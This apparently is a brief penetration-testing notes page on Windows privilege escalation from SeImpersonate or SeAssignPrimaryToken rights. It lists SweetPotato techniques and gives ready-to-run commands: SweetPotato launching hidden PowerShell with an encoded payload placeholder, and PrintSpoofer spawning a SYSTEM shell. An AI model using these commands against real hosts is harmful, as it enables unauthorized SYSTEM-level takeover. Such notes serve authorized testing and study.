Secondary Categories: 02-Windows Internals, 02-Privilege Escalation

There are several methods to leverage this permission on a Windows system. The following permission conditions: SeImpersonate or SeAssignPrimaryToken

We can identify if the current user has these permissions by running the following command:

whoami /priv

Sweet Potato

This tool contains various privilege escalation techniques that allow the attacker to go from a service account to SYSTEM. It leverages the following methods:

  • Orignal RottenPotato code and exploit by @foxglovesec
  • Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
  • PrintSpoofer discovery and original exploit by @itm4n
  • EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam
# Exploiting a host with SweetPotato
.\SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc <BASE64_CMD>"

PrintSpoofer

First ensure the print spooler service is running using the following powershell or using windows services.

Get-Service Spooler

After transferring the binary or leveraging a COFF file you can execute the following to escalate privileges.

.\PrintSpoofer.exe -i -c powershell

Also Check Out:

  • PLACEHOLDER